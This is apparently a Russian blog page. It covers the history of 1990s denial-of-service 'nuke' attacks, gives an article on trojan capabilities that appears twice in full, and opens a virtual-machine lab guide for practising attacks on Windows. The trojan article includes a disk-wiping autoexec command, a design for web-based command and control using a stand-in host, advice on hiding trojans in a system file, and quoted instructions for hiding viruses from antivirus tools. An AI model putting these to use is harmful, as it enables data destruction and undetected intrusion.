Словом Nuke (нюк) называют сегодня любую атаку на порты удаленных компьютеров, приводящую к краху операционной системы или разрыву интернет-соединения. Nuke не нарушает состояние файловой системы и не рушит "железо" компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так как могла работать только на UNIX системах с правами root. Идея nuke.c заключалась в том, что она отсылала неправильные (invalid) ICMP пакеты, и машина-хост теряла связь.
В январе 1997 появилась атака под названием Ping o' Death, и 18 распространенных операционныхсистем оказались к ней весьма чувствительны. Ping o' Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата - полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).
7 июня 1997 г. некто по имени "_eci" впервые опубликовал в Сети исходный код реализующей ее программы.
В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился "залатать дыры" своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.
В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.
В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением -- программные заплатки, справлявшиеся с SSPing, оказались бессильны.
Январь 1998 года. Bonk и Bonik - модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в "группу риска" пользователи так и не удосужились эту "заплатку" установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.
Часто атаки комбинируются. Например, Land & IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing - подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)
пʼятниця, 20 березня 2009 р.
Что такое трояны?
Дамы и господа! С опозданием на год я все-таки решил написать для Вас эту статью. Написать просто из уважения к Вам. Не в обиду будет сказано, но большинство так называемых "пользователей" персональных компьютеров на самом деле ОЧЕНЬ мало понимают работу САМИХ компьютеров. Дело даже не в том, что кто-то чего-то не знает... Скажите, зачем например, юристу, менеджеру, доктору наук или врачу ДОСКОНАЛЬНО знать все тонкости работы компьютера? У этих людей, как правило, своя специфика, они гораздо больше знают в другой области наук. Знать принципы работы компьютера, высшую математику, десяток языков программирования, сетевые протоколы, несколько операционных систем, принципы атаки и защиты на компьютеры этим людям совсем необязательно. Но по роду своих занятий, по своей работе такие люди вынуждены использовать вычислительную технику хотя бы потому, что это достаточно удобно. Но что именно удобно, благодаря чему использовать компьютеры стало удобно? Позволю себе высказать свою точку зрения. Если кто-то со мной не согласен, то мы обсудим это по e-mail.
Итак... Многие ругают операционную систему WINDOWS любой версии и его создателя Билла Гейтса. Действительно, хороша или плоха его операционная система? Как говорится, это еще бабушка надвое сказала. С одной стороны - хороша, с другой - плоха...
Чем хороша? Прежде всего тем, что она КРАЙНЕ проста в установке, настройке и использовании (На взгляд "простого" пользователя). Практически любой человек, даже не имевший опыта работы за компьютером, может за пару дней научиться сносно использовать его для офиса, для игр и для прочих задач. В этом смысле WINDOWS - это воплощение гениальной идеи. (Я это серьезно!).
А чем же плоха WINDOWS, что многие ругают ее последними словами? О, тут вам "крутой компьютерщик" много чего наговорит... Сразу стоит сказать, что это далеко не самая стабильная в работе операционная система, это присуще как ее первым версиям, так и последним. Процитирую одного из "серьезных" пользователей: - "Как я могу доверить свою научную работу этой операционке, если она в любой момент отправит все мои труды коту под хвост?" Этот человек действительно в результате сбоя потерял важные данные...
Но самое важное, что операционная система WINDOWS буквально оптимизирована для взлома...
Действительно, Microsoft не потрудилась применить криптостойкие алгоритмы защиты (частный случай). Что было сделано, чтоб спрятать те же самые пароли? Всего лишь то, чтоб их нельзя было увидеть, нажав F3 в Нортон Коммандере. Это помогло бы только против самых что ни на есть "псевдо" хакеров. (Даже нечем похвалиться, если бы вас так подломали).
Но создатели WINDOWS решили не утруждать себя и закодировали все пароли в системе некриптостойкими алгоритмами, в частности за"XOR"иванием. Такое кодирование вскрывается за доли секунды, в отличие от метода кодирования паролей в UNIX-системах, где вскрыть пароль можно только прямым перебором, да и то при достаточно большой вычислительной можности перебор всех вариантов одного пароля займет в среднем 12 тысяч лет.
Но самое примечательное - это то, что в плане атак по сети WINDOWS просто полностью открыта! Есть немало программ, которые посылая несколько байтов по сети на компьютер-жертву, заставляют его зависнуть или перезагрузиться. В народе по этому поводу проскакивают такие слова, как "Nuke", "Ping Flood", "TearDrop" и много чего еще. Об этих атаках много уже написано статей, обзоров, уже существует достаточное количество "заплаток", и если грамотно воспользоваться этим, то можно себя более-менее обезопасить.
Но существует такой изощренный способ атак, что большинство людей перед ними бессильны. Что это? Можно сказать одним словом - ТРОЯНЫ.
Трояны - что это такое? Чем они отличаются от вирусов, как распространяются, какой вред они могут принести?
Само определение "Троян", или "Троянский конь" появилось по аналогии с мифическим конем, то есть снаружи это красивая вещь, а внутри спрятано что-то нехорошее. Что именно? Про все трояны ничего конкретного сказать нельзя, можно лишь отметить, что от вирусов они отличаются тем, что зачастую управляются человеком, сидящим "на другом конце провода". Это в том случае, если ваш компьютер подключен к Интернет. Отсутствие подключения зачастую сводит на нет все усилия троянов. Данные программы могут не иметь деструктивных функций. Их назначение иное - извлекать информацию, несанкционированно изменять ее, а также иметь полный контроль над компьютером, настолько полный, что даже человек, сидящий не посредственно за ним, не может так всеобъемлемо управлять этим теперь уже непредсказуемым "ящиком".
Итак, что же из себя представляет программа-троян? А ничего особенного, даже начинающий программист способен ее написать. Принцип основан на том, что программа является одной из задач Windows, как правило, невидимой по Ctrl-Alt-Del. Программа-троян "слушает" порты (это то, благодаря чему существует соединение по сети, портов может быть до 65535. Например, ftp-сервер слушает 21 порт, web-сервер, как правило, 80 порт, почтовый сервер - порт 25 для отправки и порт 110 для приема почты), и когда на определенный порт приходит пакет данных, программа-троян исполняет пришедшие команды.
Для трояна ничего не стоит выцепить любой закешированный пароль к любому из ресурсов, перехватывать нажатие клавиш на вашей клавиатуре...
Ниже я приведу далеко не полный список функций, выполняемых троянами. Вы представьте сразу, что эти действия выполняются на вашей машине. Итак, начнем...
Доступ к дискам. Можно копировать, стирать файлики... Все файловые операции, то есть. Ничего не стоит прочитать вашу почту, которая уже получена и хранится в файле "Inbox", или поправить autoexec.bat, вписав туда строчку "echo y|format c:>nul", благодаря которой при перезагрузке жесткий диск будет безо всяких вопросов отформатирован.
Перехват клавиатуры. Вот он, ваш парольчик-то... Кража закешированных паролей (тех, что "запоминаются" системой). Вот все пароли сразу...
Сбор информации о системе (какой логин, сколько памяти, диски, принтеры...)
Получение копии вашего экрана. Без комментариев.
Запрещение нажатий определенных клавиш на клавиатуре. (Издевательство.)
Поменять кнопки мышки местами. (Тоже издевательство.)
Контроль координат курсора мыши (ой, мышка сама ездит???)
Открыть/закрыть CD-ROM. (Оооочень забавно...)
Или вообще блокировать кнопку "Eject" на нем... (CD-ROM сломался!!!)
Перенаправление консоли (то есть как telnet, только например, command.com запустился у вас, а на экран он вышел не у вас... А тот человек набрал команду "format c:" и нажал "y"...)
Перенаправление портов. Это еще серьезней. Злоумышленник будет ломать банк, Белый Дом, спутники... А ФБР или ФСБ почему-то придет к вам... То есть, сигнал пойдет от злоумышленника через ваш компьютер, и везде засветится именно ваш IP-адрес...
Узнать, какие программы у вас запущены.
Закрыть парочку этих программ (например, пасьянс у секретарши или Word у профессора...)
Запустить программу (вот вам калькулятор, считайте на здоровье. Или еще один, новый троян, которого антивирусы не видят.)
Вывести на экран картинку (порно, в то время, когда у начальника важный посетитель.)
Показать/убрать панель задач (вот весело-то, кнопки Пуск нет... часов нет...)
Выключить или перезагрузить компьютер. (Без комментариев.)
Отключить компьютер от Интернета. (Пусть перезагружается, чтоб снова работать)
Если у вас подключен микрофон, то можно услышать вас.
Если у вас есть Web-Camera, то можно и увидеть вас.
Если у вас слишком громко играет музыка, то можно ее вам убавить.
Или наоборот, проиграть на вашей машине звуковой файл...
А можно и документ на вашем принтере напечатать. Можно подредактировать ваш реестр. Там хранятся ВСЕ настройки... Что "настройщику" придет в голову, неизвестно.
Можно диалоговые окошки выводить. Вот такие, например...
Иногда полезно бывает открыть вам броузер и "послать" вас например, на www.fuck.ru. Вам должно понравиться. Особенно если вы человек высокой морали.
Можно вывести окошко, в котором вы обычно набираете пароль... 90 %, что вы наберете его. Это может быть пароль от почты, от ICQ или еще от чего-нибудь. Последствия известны...
Можно посмотреть, что вы там через буфер обмена носите. А может, там пароль???
В конце концов, можно стереть у вас содержимое Flash-BIOS. Последствия будут, как от вируса "Чернобыль" (Win.CIH).
Можно с машины-жертвы просканировать порты, например, на сервере... Вот админ сервера удивится, когда начальник, ничего в этом не понимающий, засветит свой IP в логах...
Можно переименовать заголовки окон, например, "WinWord" в "Привет от Васи Пупкина"... Человек будет в трансе...
Можно текст вам переслать, как будто вы его сами на клавиатуре набрали. (Клавиатура с ума сошла!!!)
Время на компьютере изменить - тоже не проблема. Особенно опасным может быть такая комбинация: закачать вам на диск вирус "Чернобыль" (Win.Cih), изменить время на 26 апреля, запустить этот файл, с полчасика подождать и перезагрузить вас.
Ваш компьютер может посылать каждый раз при включении почту злоумышленнику, сообщая о времени включения и о других параметрах.
А также в некоторых троянах есть функция самоликвидирования, то есть при грамотном использовании их можно нанести очень большой урон и замести практически все следы деятельности, так что доказательств не останется.
Вот такие пироги... Это далеко не полный список. Это всего лишь то, что я вспомнил "с лету". Подытоживая все это, хочу сказать, что контроль над компьютером таким образом осуществляется АБСОЛЮТНО ПОЛНЫЙ. Насколько полный - зависит от конкретного трояна и от фантазии его создателей. Прогресс идет...
Вот моя точка зрения, как дальше будут развиваться трояны:
1. Насчет обнаруживаемости антивирусами... Ну, тут вряд ли что-то изменится, концепция известна давно. Спустя некоторое время после попадания вредной программы в руки антивирусописателей, на многих компьютерах часы данной программы сочтены.
2. Насчет расположения... Классический троян при запуске копирует себя в директорию Windows, например, и прописывает в реестр строку старта. Или это делается в файлах system.ini, win.ini и им подобных. Этот способ обнаружения знают многие, в таком случае даже антивируса или каких-то дополнительных программ не надо. Достаточно стандартного REGEDIT'а, или MSCONFIG (им-то я и пользуюсь). Новые поколения троянов скорее всего, будут внедряться по вирусному типу (а есть уже такие) в системные библиотеки. Таким образом, нигде не будет видна стартовая строка трояна.
3. Кстати, есть такое понятие, как "ловушки", то есть программы, перехватывающие нажатия клавиш на клавиатуре. Типичная стандартная Виндовая "ловушка", по определению одной из программ, показывающих информацию о системе - это "INTERNAT.EXE", та программа, которай отслеживает нажатия "Alt+Shift" или "Ctrl+Shift" (переключение с русского языка на английский), и показывающая в System Tray (около часов) иконку "Ru" или "En" соответственно. А есть и другие "ловушки", например достаточно широко распространенная программа "HookDump", которая логает (записывает в файл) не только нажатия клавиш, но и заголовок окна программы, в которой эти клавиши набирались, а также время, нажатия кнопок мыши и кое-что еще. Отрадно? Если всего этого не знать, то можно стать жертвой не то что профессионального хакера, а просто человека, возомнившего себя им, т.е. "псевдохакера" (или ламера, что еще хуже). Из всего этого вытекает. что троянец лучше всего внедрять в INTERNAT.EXE (а может, и еще кое-куда), т.к. кое-какие нужные функции эта программа уже выполняет.
4. Двигаемся дальше... Известно, что если компьютер находится за прокси-сервером, Firewall'ом или чем-то подобным, то опасность вторжения извне на этот компьютер снижается на несколько порядков. Но ничто не мешает сделать такой троян, который бы использовал стандартный WWW-интерфейс, то есть делал бы то же, что и пользователь - шел бы на указанный заранее WWW-адрес, например обращался бы к файлу http://www.vasja_pupkin.mil/command.cmd, в котором содержались бы команды типа "GET FILETREE", которые необходимо выполнить. Затем результаты отправлялись бы на адрес vasja@pupkin.mil, прочитав которые, злоумышленник запоимеет все, что ему надо. Как защититься от такого способа? Ведь если закрыть порты, как это делалось, например, с BackOrifice (блокация порта 31337, и нет проблем), то пользователь не сможет читать/отправлять почту, заниматься WEB-серфингом... То есть это есть потеря главной функции, к которой прицепился троян. Пока таких продуктов в широком употреблении нет, но я уверен, что они уже существуют.
5. В настоящее время есть много программ, который позволяют зашифровать и/или заархивировать исполняемый файл так, что антивирусы не смогут его обнаружить. Например, если рассмотреть старый DOSовый вариант самораспаковывающихся программ при их исполнении: цитирую первый номер хакерского журнала "Infected Voice":
"Подготовка вируса к распространению.
1. Как скрыть скомпрессированный файл
2. Как дважды скомпрессировать файл
1. Скрывая подготовленные к распространению вирусы в файле, заПыколотив (PKLITE) или заЛзексив их (LZEXE), хотя бы с опцией ExtraCompression, никогда нет уверенности в том, что та или иная задница (DR. WEB), увидев лейбл LZ или PKLITE, не полезет туда с целью выПЫколотить оригинальчик. Здесь предлагаются некоторые методы по защите от этого.
Конечно, для начала вы скомпрессируете ваш файл чем-нибудь типа PkLite или LZexe, и даже с опцией Extra Compression. Готово? Нет - это еще не все. Загрузите-ка этот файл в HEX-editor и посмотрите в начало:
Виден заголовок? "PKLITE Corp."... Забейте мусором все от "PKLITE... до ...Rights Reserved" , а также извратите до неузнаваемости надпись "Not enough memory", забейте ее нулями, (или символами 07 -вот пищать будет!) или чем-нибудь еще, но помните, что это г... будет выводиться на экран при нехватке памяти. Не трогайте '$'! Не забивайте эти участки текстом - это будет заметно.
Итак, теперь ваш файл - неразжимаем с помощью утилит - непонятен для глаза - непроверяем фаКами(тупейшие программы!),- теми из них, которые имеют наглость лезть файлам под одежду PkLite'вского производства.
Ну и, конечно, не стоит заражать файл вирусом в чистом виде. Лучше напишите инсталлятор, который сделает это не сразу.
2. Сейчас я расскажу вам, как скомпрессировать файл два раза:
- один раз - Pklite'ом
- второй раз - LZExe
Что тут неясного - откомпрессить файл Pklite'ом, потом Lzexe... Нате вам дулю - Lzexe не напишет что-то типа "ужат на минус 5%", он просто не даст вам такого сделать ваще! А теперь вы ему дулю - посмотрите, что там у нас в текущем каталоге, хорошо посмотрите, - Undelet'oм. хZEXE.TMP. Восстановим LZEXE.TMP - это и есть дважды обработанный файл. Переименовываем его в то, что нам надо. Дальше см. п.5.1."
Конец цитаты... Впечатляет? Как говорится, все гениальное просто. И от DOSа до WINDOWSа в этом смысле всего лишь один шаг. Антивирус не сможет обнаружить сигнатуру вируса, это сможет сделать только человек. В смысле, не обнаружить сигнатуру, а обнаружить наличие вируса на компьютере. Как - это уже другой вопрос, и он рассматривается в другой моей статье.
Елесин Д.Е.
Итак... Многие ругают операционную систему WINDOWS любой версии и его создателя Билла Гейтса. Действительно, хороша или плоха его операционная система? Как говорится, это еще бабушка надвое сказала. С одной стороны - хороша, с другой - плоха...
Чем хороша? Прежде всего тем, что она КРАЙНЕ проста в установке, настройке и использовании (На взгляд "простого" пользователя). Практически любой человек, даже не имевший опыта работы за компьютером, может за пару дней научиться сносно использовать его для офиса, для игр и для прочих задач. В этом смысле WINDOWS - это воплощение гениальной идеи. (Я это серьезно!).
А чем же плоха WINDOWS, что многие ругают ее последними словами? О, тут вам "крутой компьютерщик" много чего наговорит... Сразу стоит сказать, что это далеко не самая стабильная в работе операционная система, это присуще как ее первым версиям, так и последним. Процитирую одного из "серьезных" пользователей: - "Как я могу доверить свою научную работу этой операционке, если она в любой момент отправит все мои труды коту под хвост?" Этот человек действительно в результате сбоя потерял важные данные...
Но самое важное, что операционная система WINDOWS буквально оптимизирована для взлома...
Действительно, Microsoft не потрудилась применить криптостойкие алгоритмы защиты (частный случай). Что было сделано, чтоб спрятать те же самые пароли? Всего лишь то, чтоб их нельзя было увидеть, нажав F3 в Нортон Коммандере. Это помогло бы только против самых что ни на есть "псевдо" хакеров. (Даже нечем похвалиться, если бы вас так подломали).
Но создатели WINDOWS решили не утруждать себя и закодировали все пароли в системе некриптостойкими алгоритмами, в частности за"XOR"иванием. Такое кодирование вскрывается за доли секунды, в отличие от метода кодирования паролей в UNIX-системах, где вскрыть пароль можно только прямым перебором, да и то при достаточно большой вычислительной можности перебор всех вариантов одного пароля займет в среднем 12 тысяч лет.
Но самое примечательное - это то, что в плане атак по сети WINDOWS просто полностью открыта! Есть немало программ, которые посылая несколько байтов по сети на компьютер-жертву, заставляют его зависнуть или перезагрузиться. В народе по этому поводу проскакивают такие слова, как "Nuke", "Ping Flood", "TearDrop" и много чего еще. Об этих атаках много уже написано статей, обзоров, уже существует достаточное количество "заплаток", и если грамотно воспользоваться этим, то можно себя более-менее обезопасить.
Но существует такой изощренный способ атак, что большинство людей перед ними бессильны. Что это? Можно сказать одним словом - ТРОЯНЫ.
Трояны - что это такое? Чем они отличаются от вирусов, как распространяются, какой вред они могут принести?
Само определение "Троян", или "Троянский конь" появилось по аналогии с мифическим конем, то есть снаружи это красивая вещь, а внутри спрятано что-то нехорошее. Что именно? Про все трояны ничего конкретного сказать нельзя, можно лишь отметить, что от вирусов они отличаются тем, что зачастую управляются человеком, сидящим "на другом конце провода". Это в том случае, если ваш компьютер подключен к Интернет. Отсутствие подключения зачастую сводит на нет все усилия троянов. Данные программы могут не иметь деструктивных функций. Их назначение иное - извлекать информацию, несанкционированно изменять ее, а также иметь полный контроль над компьютером, настолько полный, что даже человек, сидящий не посредственно за ним, не может так всеобъемлемо управлять этим теперь уже непредсказуемым "ящиком".
Итак, что же из себя представляет программа-троян? А ничего особенного, даже начинающий программист способен ее написать. Принцип основан на том, что программа является одной из задач Windows, как правило, невидимой по Ctrl-Alt-Del. Программа-троян "слушает" порты (это то, благодаря чему существует соединение по сети, портов может быть до 65535. Например, ftp-сервер слушает 21 порт, web-сервер, как правило, 80 порт, почтовый сервер - порт 25 для отправки и порт 110 для приема почты), и когда на определенный порт приходит пакет данных, программа-троян исполняет пришедшие команды.
Для трояна ничего не стоит выцепить любой закешированный пароль к любому из ресурсов, перехватывать нажатие клавиш на вашей клавиатуре...
Ниже я приведу далеко не полный список функций, выполняемых троянами. Вы представьте сразу, что эти действия выполняются на вашей машине. Итак, начнем...
Доступ к дискам. Можно копировать, стирать файлики... Все файловые операции, то есть. Ничего не стоит прочитать вашу почту, которая уже получена и хранится в файле "Inbox", или поправить autoexec.bat, вписав туда строчку "echo y|format c:>nul", благодаря которой при перезагрузке жесткий диск будет безо всяких вопросов отформатирован.
Перехват клавиатуры. Вот он, ваш парольчик-то... Кража закешированных паролей (тех, что "запоминаются" системой). Вот все пароли сразу...
Сбор информации о системе (какой логин, сколько памяти, диски, принтеры...)
Получение копии вашего экрана. Без комментариев.
Запрещение нажатий определенных клавиш на клавиатуре. (Издевательство.)
Поменять кнопки мышки местами. (Тоже издевательство.)
Контроль координат курсора мыши (ой, мышка сама ездит???)
Открыть/закрыть CD-ROM. (Оооочень забавно...)
Или вообще блокировать кнопку "Eject" на нем... (CD-ROM сломался!!!)
Перенаправление консоли (то есть как telnet, только например, command.com запустился у вас, а на экран он вышел не у вас... А тот человек набрал команду "format c:" и нажал "y"...)
Перенаправление портов. Это еще серьезней. Злоумышленник будет ломать банк, Белый Дом, спутники... А ФБР или ФСБ почему-то придет к вам... То есть, сигнал пойдет от злоумышленника через ваш компьютер, и везде засветится именно ваш IP-адрес...
Узнать, какие программы у вас запущены.
Закрыть парочку этих программ (например, пасьянс у секретарши или Word у профессора...)
Запустить программу (вот вам калькулятор, считайте на здоровье. Или еще один, новый троян, которого антивирусы не видят.)
Вывести на экран картинку (порно, в то время, когда у начальника важный посетитель.)
Показать/убрать панель задач (вот весело-то, кнопки Пуск нет... часов нет...)
Выключить или перезагрузить компьютер. (Без комментариев.)
Отключить компьютер от Интернета. (Пусть перезагружается, чтоб снова работать)
Если у вас подключен микрофон, то можно услышать вас.
Если у вас есть Web-Camera, то можно и увидеть вас.
Если у вас слишком громко играет музыка, то можно ее вам убавить.
Или наоборот, проиграть на вашей машине звуковой файл...
А можно и документ на вашем принтере напечатать. Можно подредактировать ваш реестр. Там хранятся ВСЕ настройки... Что "настройщику" придет в голову, неизвестно.
Можно диалоговые окошки выводить. Вот такие, например...
Иногда полезно бывает открыть вам броузер и "послать" вас например, на www.fuck.ru. Вам должно понравиться. Особенно если вы человек высокой морали.
Можно вывести окошко, в котором вы обычно набираете пароль... 90 %, что вы наберете его. Это может быть пароль от почты, от ICQ или еще от чего-нибудь. Последствия известны...
Можно посмотреть, что вы там через буфер обмена носите. А может, там пароль???
В конце концов, можно стереть у вас содержимое Flash-BIOS. Последствия будут, как от вируса "Чернобыль" (Win.CIH).
Можно с машины-жертвы просканировать порты, например, на сервере... Вот админ сервера удивится, когда начальник, ничего в этом не понимающий, засветит свой IP в логах...
Можно переименовать заголовки окон, например, "WinWord" в "Привет от Васи Пупкина"... Человек будет в трансе...
Можно текст вам переслать, как будто вы его сами на клавиатуре набрали. (Клавиатура с ума сошла!!!)
Время на компьютере изменить - тоже не проблема. Особенно опасным может быть такая комбинация: закачать вам на диск вирус "Чернобыль" (Win.Cih), изменить время на 26 апреля, запустить этот файл, с полчасика подождать и перезагрузить вас.
Ваш компьютер может посылать каждый раз при включении почту злоумышленнику, сообщая о времени включения и о других параметрах.
А также в некоторых троянах есть функция самоликвидирования, то есть при грамотном использовании их можно нанести очень большой урон и замести практически все следы деятельности, так что доказательств не останется.
Вот такие пироги... Это далеко не полный список. Это всего лишь то, что я вспомнил "с лету". Подытоживая все это, хочу сказать, что контроль над компьютером таким образом осуществляется АБСОЛЮТНО ПОЛНЫЙ. Насколько полный - зависит от конкретного трояна и от фантазии его создателей. Прогресс идет...
Вот моя точка зрения, как дальше будут развиваться трояны:
1. Насчет обнаруживаемости антивирусами... Ну, тут вряд ли что-то изменится, концепция известна давно. Спустя некоторое время после попадания вредной программы в руки антивирусописателей, на многих компьютерах часы данной программы сочтены.
2. Насчет расположения... Классический троян при запуске копирует себя в директорию Windows, например, и прописывает в реестр строку старта. Или это делается в файлах system.ini, win.ini и им подобных. Этот способ обнаружения знают многие, в таком случае даже антивируса или каких-то дополнительных программ не надо. Достаточно стандартного REGEDIT'а, или MSCONFIG (им-то я и пользуюсь). Новые поколения троянов скорее всего, будут внедряться по вирусному типу (а есть уже такие) в системные библиотеки. Таким образом, нигде не будет видна стартовая строка трояна.
3. Кстати, есть такое понятие, как "ловушки", то есть программы, перехватывающие нажатия клавиш на клавиатуре. Типичная стандартная Виндовая "ловушка", по определению одной из программ, показывающих информацию о системе - это "INTERNAT.EXE", та программа, которай отслеживает нажатия "Alt+Shift" или "Ctrl+Shift" (переключение с русского языка на английский), и показывающая в System Tray (около часов) иконку "Ru" или "En" соответственно. А есть и другие "ловушки", например достаточно широко распространенная программа "HookDump", которая логает (записывает в файл) не только нажатия клавиш, но и заголовок окна программы, в которой эти клавиши набирались, а также время, нажатия кнопок мыши и кое-что еще. Отрадно? Если всего этого не знать, то можно стать жертвой не то что профессионального хакера, а просто человека, возомнившего себя им, т.е. "псевдохакера" (или ламера, что еще хуже). Из всего этого вытекает. что троянец лучше всего внедрять в INTERNAT.EXE (а может, и еще кое-куда), т.к. кое-какие нужные функции эта программа уже выполняет.
4. Двигаемся дальше... Известно, что если компьютер находится за прокси-сервером, Firewall'ом или чем-то подобным, то опасность вторжения извне на этот компьютер снижается на несколько порядков. Но ничто не мешает сделать такой троян, который бы использовал стандартный WWW-интерфейс, то есть делал бы то же, что и пользователь - шел бы на указанный заранее WWW-адрес, например обращался бы к файлу http://www.vasja_pupkin.mil/command.cmd, в котором содержались бы команды типа "GET FILETREE", которые необходимо выполнить. Затем результаты отправлялись бы на адрес vasja@pupkin.mil, прочитав которые, злоумышленник запоимеет все, что ему надо. Как защититься от такого способа? Ведь если закрыть порты, как это делалось, например, с BackOrifice (блокация порта 31337, и нет проблем), то пользователь не сможет читать/отправлять почту, заниматься WEB-серфингом... То есть это есть потеря главной функции, к которой прицепился троян. Пока таких продуктов в широком употреблении нет, но я уверен, что они уже существуют.
5. В настоящее время есть много программ, который позволяют зашифровать и/или заархивировать исполняемый файл так, что антивирусы не смогут его обнаружить. Например, если рассмотреть старый DOSовый вариант самораспаковывающихся программ при их исполнении: цитирую первый номер хакерского журнала "Infected Voice":
"Подготовка вируса к распространению.
1. Как скрыть скомпрессированный файл
2. Как дважды скомпрессировать файл
1. Скрывая подготовленные к распространению вирусы в файле, заПыколотив (PKLITE) или заЛзексив их (LZEXE), хотя бы с опцией ExtraCompression, никогда нет уверенности в том, что та или иная задница (DR. WEB), увидев лейбл LZ или PKLITE, не полезет туда с целью выПЫколотить оригинальчик. Здесь предлагаются некоторые методы по защите от этого.
Конечно, для начала вы скомпрессируете ваш файл чем-нибудь типа PkLite или LZexe, и даже с опцией Extra Compression. Готово? Нет - это еще не все. Загрузите-ка этот файл в HEX-editor и посмотрите в начало:
Виден заголовок? "PKLITE Corp."... Забейте мусором все от "PKLITE... до ...Rights Reserved" , а также извратите до неузнаваемости надпись "Not enough memory", забейте ее нулями, (или символами 07 -вот пищать будет!) или чем-нибудь еще, но помните, что это г... будет выводиться на экран при нехватке памяти. Не трогайте '$'! Не забивайте эти участки текстом - это будет заметно.
Итак, теперь ваш файл - неразжимаем с помощью утилит - непонятен для глаза - непроверяем фаКами(тупейшие программы!),- теми из них, которые имеют наглость лезть файлам под одежду PkLite'вского производства.
Ну и, конечно, не стоит заражать файл вирусом в чистом виде. Лучше напишите инсталлятор, который сделает это не сразу.
2. Сейчас я расскажу вам, как скомпрессировать файл два раза:
- один раз - Pklite'ом
- второй раз - LZExe
Что тут неясного - откомпрессить файл Pklite'ом, потом Lzexe... Нате вам дулю - Lzexe не напишет что-то типа "ужат на минус 5%", он просто не даст вам такого сделать ваще! А теперь вы ему дулю - посмотрите, что там у нас в текущем каталоге, хорошо посмотрите, - Undelet'oм. хZEXE.TMP. Восстановим LZEXE.TMP - это и есть дважды обработанный файл. Переименовываем его в то, что нам надо. Дальше см. п.5.1."
Конец цитаты... Впечатляет? Как говорится, все гениальное просто. И от DOSа до WINDOWSа в этом смысле всего лишь один шаг. Антивирус не сможет обнаружить сигнатуру вируса, это сможет сделать только человек. В смысле, не обнаружить сигнатуру, а обнаружить наличие вируса на компьютере. Как - это уже другой вопрос, и он рассматривается в другой моей статье.
Елесин Д.Е.
вівторок, 17 березня 2009 р.
ВЗЛОМ ПК, под управлением Windows.
#ВЗЛОМ ПК, под управлением Windows. #КЛАССИФИКАЦИЯ АТАК.
Атаки на протокол
Атаки на ПО
Атаки на пользователя
ПОЛИГОН ДЛЯ ИСПЫТАНИЙ.
Необходимый софт:
Любой дистрибьютив Windows XP (SP2,SP3 )
Виртуальная машина Vmware.
Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем.
Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG
Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому
http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG
адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG
Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.
http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG
Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG
#УСТАНОВКА СВЯЗИ.#
Необходимый софт:
ФТП — сервер (Serv -U)
Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.
